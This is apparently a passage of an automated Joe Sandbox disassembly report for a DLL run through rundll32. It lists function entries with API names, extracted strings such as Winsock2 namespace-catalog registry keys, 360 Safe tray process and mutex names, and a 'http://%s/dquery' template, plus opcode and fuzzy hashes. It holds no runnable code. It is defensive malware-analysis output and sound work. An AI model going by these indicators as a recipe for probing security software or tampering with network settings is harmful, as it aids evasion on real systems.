                                                                                                  • Instruction Fuzzy Hash: FB419D32600B48CAEB928F35D8947DC37A4F74CBE8F04A215FA5A57AA5DF35C699C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: ??3@$CriticalDeleteSection
                                                                                                  • String ID: %s\NameSpace_Catalog5\Catalog_Entries64\%012d$%s\NameSpace_Catalog5\Catalog_Entries\%012d$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5
                                                                                                  • API String ID: 1297904149-2676930693
                                                                                                  • Opcode ID: 3d1b4d4945e0e21b4209534fb7adf2456145591c447b83fcd6c449b0aaaa6bb8
                                                                                                  • Instruction ID: 73cc0848a655b1fb88aa06a885314cf1e75da9385d723178a5cf1b8a64167aea
                                                                                                  • Opcode Fuzzy Hash: 3d1b4d4945e0e21b4209534fb7adf2456145591c447b83fcd6c449b0aaaa6bb8
                                                                                                  • Instruction Fuzzy Hash: F631F232741B4892EF668F25E4443DC63A0F74ABE0F588621EB5C07BA5CF39D5A9C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleProcess$OpenTokenWindow$DuplicateFindThread
                                                                                                  • String ID: Progman$Program manager
                                                                                                  • API String ID: 3967587520-2890643340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: Resource$FreeLibraryLoad$FindLockQuerySizeofValuefreemallocmemmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 3317409091-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: Valuememset$CloseEnumOpen
                                                                                                  • String ID: stat
                                                                                                  • API String ID: 3313869694-548994849
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$Leave$Enter$AddressHandleModuleProc
                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                                                  • API String ID: 3224368425-736604160
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CountCriticalErrorFreeInitializeLastLibrarySectionSpinmemset
                                                                                                  • String ID: Kernel32.dll$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection
                                                                                                  • API String ID: 1208898459-1575494070
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: FromString_wcsupr$HeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 2249050647-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: wcsstr$_wcsicmpmemmove
                                                                                                  • String ID: <meta$content$http-equiv$refresh$url
                                                                                                  • API String ID: 2361349637-3031182906
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharCriticalMultiSectionWidehtonlhtons$EnterLeavememmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 505489203-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: %s\NameSpace_Catalog5\Catalog_Entries64\%012d$%s\NameSpace_Catalog5\Catalog_Entries\%012d$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5
                                                                                                  • API String ID: 0-1196714001
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: String$??3@FreeFromHeapProcess_wcsupr_wtoi
                                                                                                  • String ID: hotkey$internetshortcut
                                                                                                  • API String ID: 2885337837-1159320594
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentSleepThread
                                                                                                  • String ID: JudgeVersion
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: File$AttributesDeleteErrorLast$MutexRelease
                                                                                                  • String ID: PRAGMA synchronous = OFF;
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: File$Path$Exists$ModuleNameRemoveSpecmemset
                                                                                                  • String ID: %hd.%hd.%hd.%hd$\360ver.dll$\QHVer.dll
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: ??2@CriticalSection$??3@Deleterand$CountInitializeTickmemsetsrand
                                                                                                  • String ID: http://%s/dquery
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: File$Path$CriticalExistsModuleNameSection$AppendCloseControlCreateCurrentDeviceEnterHandleLeaveProcessmemset
                                                                                                  • String ID: \Config\MessageCenter.db$\deepscan\heavygate64.dll$\heavygate64.dll
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: FreeFromPathTaskmemset$AttributesCombineCreateFileList
                                                                                                  • String ID: :
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: ClassNameTextWindowmemset
                                                                                                  • String ID: ApplicationFrameWindow$Microsoft Edge
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc$Delete
                                                                                                  • String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: File$View$CloseFindHandleMappingMessageOpenSendTimeoutUnmapWindow
                                                                                                  • String ID: Q360GameModeMapping$Q360SafeMonClass
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$AppendCriticalPathSection$memset$EnterFileModuleName$??2@CountErrorInitializeLastLeaveSpin
                                                                                                  • String ID: ..\deepscan\$speedmem2.hg
                                                                                                  • API String ID: 2338990259-1390971677
                                                                                                  • Opcode ID: 1f5c69f5d04849719002e6335fbd6f545d460fa84012e21aa4d7e04e73bbc5ea
                                                                                                  • Instruction ID: 91bce694e0342d9d21a92653d8ecf9702c458f92e478111cc4d5f0d53c5c3f7e
                                                                                                  • Opcode Fuzzy Hash: 1f5c69f5d04849719002e6335fbd6f545d460fa84012e21aa4d7e04e73bbc5ea
                                                                                                  • Instruction Fuzzy Hash: BB212C35215B4D81EA928B64FC953996360FB5C7E4F409215E96D077B4EF78C64EC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSectionhtonlhtons$EnterLeavememmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 33644419-0
                                                                                                  • Opcode ID: c447bd6221281bfe5dd6872084f78464a8d5e064d41710de40e0bf531ce06f55
                                                                                                  • Instruction ID: 90b71582b8c4a32b78347334d3d295f004072f45cff62f784db803bd1658b447
                                                                                                  • Opcode Fuzzy Hash: c447bd6221281bfe5dd6872084f78464a8d5e064d41710de40e0bf531ce06f55
                                                                                                  • Instruction Fuzzy Hash: 69614736B00B549AF792DFA1E9503ED33B5B70878CF458019EE5627A98DF34866EC348
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: _errno$___lc_handle_func
                                                                                                  • String ID:
                                                                                                  • API String ID: 1446566272-0
                                                                                                  • Opcode ID: 9ed143e4e78ad7ca36c430c2939c308b5d5fe1ebbbc6467e3c222cd59980e3d6
                                                                                                  • Instruction ID: 126987ea53a22a0156f2cb7aa7a647ca75503bfd193424e832b10eaea163e651
                                                                                                  • Opcode Fuzzy Hash: 9ed143e4e78ad7ca36c430c2939c308b5d5fe1ebbbc6467e3c222cd59980e3d6
                                                                                                  • Instruction Fuzzy Hash: 5851E77270434487FB975F69A0403EDA290AB88BD5F58C034BBCC47AD6DE7DCA9A8710
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: InitVariant$ArraySafe$CreateElement
                                                                                                  • String ID:
                                                                                                  • API String ID: 3308809976-0
                                                                                                  • Opcode ID: 3e6f35141bead04b4f889ba04b40996eb253cad0316321e95f0b8ebe6d532838
                                                                                                  • Instruction ID: 146264a788ca7c4eb20d782c9947d04824275c30ee96bc1b713ea33f9e3da92e
                                                                                                  • Opcode Fuzzy Hash: 3e6f35141bead04b4f889ba04b40996eb253cad0316321e95f0b8ebe6d532838
                                                                                                  • Instruction Fuzzy Hash: 52515A32B00A548AE781CFA5EC843DD37B0F7487A9F158125EA5A97764EF34C64AC340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: AuthorityProcessToken$CloseCountCurrentErrorHandleInformationLastOpen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3222153630-0
                                                                                                  • Opcode ID: 03483a1382fa936570146296bc3f4c9eb4d3748e16a6552bbad511bfd4114ef8
                                                                                                  • Instruction ID: 72112d729816a6905d55889d123a89fc47246d9648d7bb45982a69a3b8d3ada9
                                                                                                  • Opcode Fuzzy Hash: 03483a1382fa936570146296bc3f4c9eb4d3748e16a6552bbad511bfd4114ef8
                                                                                                  • Instruction Fuzzy Hash: A8215131705B4882FB969F92F880399A3A4FBDCBC4F158035EA5957764DF3CC6598704
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: wcsstr$HeapProcess_time64free
                                                                                                  • String ID: DomainQuery$com$error_code
                                                                                                  • API String ID: 495166474-1186067173
                                                                                                  • Opcode ID: 48d2666e35a99de3c2b6d37465d73b0056f431e6c8eee1a5ce3d51caaf477776
                                                                                                  • Instruction ID: 59fbc5dadb6708d67137b6e4bedff87eb2f76b606422a1c9441d9b3eaf16e58a
                                                                                                  • Opcode Fuzzy Hash: 48d2666e35a99de3c2b6d37465d73b0056f431e6c8eee1a5ce3d51caaf477776
                                                                                                  • Instruction Fuzzy Hash: 6802C372701F4882EA91DB29D8803DD23A0FB88BE9F458215FAAD577D5DF38CA49C744
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp
                                                                                                  • String ID: %I64u$.exe$InitString$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
                                                                                                  • API String ID: 2081463915-3789319691
                                                                                                  • Opcode ID: a7524d0a6a2f2a6811e2d6bfe887dea111f6d1a43d9b514e68db11bdf2e08a92
                                                                                                  • Instruction ID: 99d661dcfab4fd9f60583e58d61e1d075c9151c162a47e32eebc6396990c7acc
                                                                                                  • Opcode Fuzzy Hash: a7524d0a6a2f2a6811e2d6bfe887dea111f6d1a43d9b514e68db11bdf2e08a92
                                                                                                  • Instruction Fuzzy Hash: A8C1B172710A488AEB929B25D8407DD33A0F749BE8F448216FE6D47BE5DF38C689C744
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: wcschrwcscmpwcsstr$FromHeapProcessString_wcslwr
                                                                                                  • String ID: clsid$clsid2
                                                                                                  • API String ID: 2934854147-3646038404
                                                                                                  • Opcode ID: 911e3de000ae97c58b3acce3279f437468a1569be05101070c01195505b2f66e
                                                                                                  • Instruction ID: bd95a24bb0aafbb45aea4f5794df0f126b37bc211fbb868afd4ed2029302fca7
                                                                                                  • Opcode Fuzzy Hash: 911e3de000ae97c58b3acce3279f437468a1569be05101070c01195505b2f66e
                                                                                                  • Instruction Fuzzy Hash: 86A16172701A4885EBA79B29C8503EE63A1FB49BD4F46C122FA1D477D6EF74CA49C340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: strchrwcscmpwcsstr$FromHeapProcessString_strlwr
                                                                                                  • String ID: clsid$clsid2
                                                                                                  • API String ID: 3075496951-3646038404
                                                                                                  • Opcode ID: b34bb257c4012ea5ea7ec63a1f36afb4f32d3c0f990deb4b92841445b61a349c
                                                                                                  • Instruction ID: 52fbb44663529e4af6cb5c57c7c12c2662acde33668ab69cc9482a834562ed8e
                                                                                                  • Opcode Fuzzy Hash: b34bb257c4012ea5ea7ec63a1f36afb4f32d3c0f990deb4b92841445b61a349c
                                                                                                  • Instruction Fuzzy Hash: B3A14E72301A4886EBA79B25C4503EE67A1BB49BD8F45C121FA1D477D6EF78CA89C340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: ??3@memmovememset
                                                                                                  • String ID: generic$unknown error
                                                                                                  • API String ID: 2528313377-3628847473
                                                                                                  • Opcode ID: de4f988636b97df9b255ecc11943299432ed388bb3462f1d961b5968a0cd6148
                                                                                                  • Instruction ID: f953be595861da4e4b866d1587ee45b735e1f1b3269ec21885f27e4079069760
                                                                                                  • Opcode Fuzzy Hash: de4f988636b97df9b255ecc11943299432ed388bb3462f1d961b5968a0cd6148
                                                                                                  • Instruction Fuzzy Hash: 4451A372704B8882EF459B16DA443AD6362F749BD0F50C221FB6A07BD6EF78C6A59340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                                                  • String ID: AddDllDirectory$kernel32
                                                                                                  • API String ID: 1437655972-3758863895
                                                                                                  • Opcode ID: 62d5c79b2ea4fb088856e3f0301c9a109d3b9d8bbbaf54877c47554339dab04f
                                                                                                  • Instruction ID: bbf3e12eda5f2f818c86a6d8723dcf8fbef42ab492d342ab48d7d832c77590ad
                                                                                                  • Opcode Fuzzy Hash: 62d5c79b2ea4fb088856e3f0301c9a109d3b9d8bbbaf54877c47554339dab04f
                                                                                                  • Instruction Fuzzy Hash: 7751E53231164885FEA6CF51E4103E962A0FB5DBE4F48C621EA6A4B7D4DF3DC649C705
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterErrorLastLeavememsetstd::_std::exception_ptr::exception_ptr
                                                                                                  • String ID: arm64$x64$x86
                                                                                                  • API String ID: 4069188616-280937049
                                                                                                  • Opcode ID: 80f3249773d162cbeeb550be5abaaeac6b7c95d6a1b3ac1e44b50876622fa97b
                                                                                                  • Instruction ID: 117583cd4254ef97ff9b72dc100ece26d9127ce95370434fd6434e2e215e4972
                                                                                                  • Opcode Fuzzy Hash: 80f3249773d162cbeeb550be5abaaeac6b7c95d6a1b3ac1e44b50876622fa97b
                                                                                                  • Instruction Fuzzy Hash: 78415B71B00A1C95FA92DB20EC843D937A4F70C7E8FA58611F96A536E6DF34C68AC740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressCurrentErrorHandleLastModuleProcProcessstd::_std::exception_ptr::exception_ptr
                                                                                                  • String ID: IsWow64Process2$Kernel32.dll
                                                                                                  • API String ID: 1364622999-2175735969
                                                                                                  • Opcode ID: 6751241f688bd49d1875dc8d854f79e14c2fff9f0de6f06901ba81ab434c2c27
                                                                                                  • Instruction ID: 5a1c62e2a9ead4f3428123871bab1930646db393e55966b9c052552951b7636c
                                                                                                  • Opcode Fuzzy Hash: 6751241f688bd49d1875dc8d854f79e14c2fff9f0de6f06901ba81ab434c2c27
                                                                                                  • Instruction Fuzzy Hash: DD416531204B4991EAA2CF14EC843DA73A4FB8D794FA18226F659437A5DF38CB4DCB44
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastMutexOpen
                                                                                                  • String ID: Local\Q360MonMutex$Local\Q360SafeI18NTray
                                                                                                  • API String ID: 2816522056-3343745797
                                                                                                  • Opcode ID: ecc565a9ab11a347c3d3f5477b7a4cd1cc110664247bbd5ff13aaeded14a432c
                                                                                                  • Instruction ID: ccff18e50d48ae3a619361c3ef7b9f3de39f23092404f672028fbe7f8de5d576
                                                                                                  • Opcode Fuzzy Hash: ecc565a9ab11a347c3d3f5477b7a4cd1cc110664247bbd5ff13aaeded14a432c
                                                                                                  • Instruction Fuzzy Hash: E8314B30502B5982F7D29BA4BC943E823A8F74EBA0F558124F569823E1CF39CB9CC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$Leave$AddressEnterFreeInitializeLibraryProc
                                                                                                  • String ID: InitLibs
                                                                                                  • API String ID: 388043826-2748520195
                                                                                                  • Opcode ID: d54e888b80642ae16c136f4daec8858b4574610897ae795fcaa0a3f587715d16
                                                                                                  • Instruction ID: 14a8bfa7cef1bdae3a626f07b321ff872beb2833b4a3adf2d3b4914cd80619d3
                                                                                                  • Opcode Fuzzy Hash: d54e888b80642ae16c136f4daec8858b4574610897ae795fcaa0a3f587715d16
                                                                                                  • Instruction Fuzzy Hash: 5631953661874882EBA78F25A4547AE23B0F78DFD4F1A9125ED5A473A4DF38C649CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileName_wcsicmp$FindModulePathmemset
                                                                                                  • String ID: 360tray.exe$QHSafeTray.exe
                                                                                                  • API String ID: 2436975468-72543816
                                                                                                  • Opcode ID: a7768d738e7b534716dd32aca9e4ff23bf3b7449249a9ac96035ea6388957e04
                                                                                                  • Instruction ID: f13d88eabac643da90db78e2c45270d8f51b6174de2d3bfd56aa28c15744bb18
                                                                                                  • Opcode Fuzzy Hash: a7768d738e7b534716dd32aca9e4ff23bf3b7449249a9ac96035ea6388957e04
                                                                                                  • Instruction Fuzzy Hash: 86114230615B4882FBA6CB21EC593D62364FB8C7A5F408225E56A867E5EF3DC74DCB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection_time64$EnterLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 3499907473-0
                                                                                                  • Opcode ID: fad2f7b7927532790d07ba8be1895770e69b37db2dedf9ef4961b264574dfbe7
                                                                                                  • Instruction ID: 2d3d355faa5a201e66dfe59503a55f94d93e9d2144db4385c4ebef4b0973e561
                                                                                                  • Opcode Fuzzy Hash: fad2f7b7927532790d07ba8be1895770e69b37db2dedf9ef4961b264574dfbe7
                                                                                                  • Instruction Fuzzy Hash: B9517B31605B4889FB968F25E9543D933A5FB0EBE8F548115FD5A27764CF39C689C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno
                                                                                                  • String ID:
                                                                                                  • API String ID: 2918714741-0
                                                                                                  • Opcode ID: 97c6daf75c94dd34b649a7a3f9a9ab6583bbf65966f83f2829fedd4982e22aff
                                                                                                  • Instruction ID: 8158435372b26aa4a6dd2edb7174a458af360551698bfd787e5366ef90707461
                                                                                                  • Opcode Fuzzy Hash: 97c6daf75c94dd34b649a7a3f9a9ab6583bbf65966f83f2829fedd4982e22aff
                                                                                                  • Instruction Fuzzy Hash: 0441A733604A4886EAA36FA9A4003DD7290BB8C7F4F55C310FA684B7D6CF3DC6598711
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free
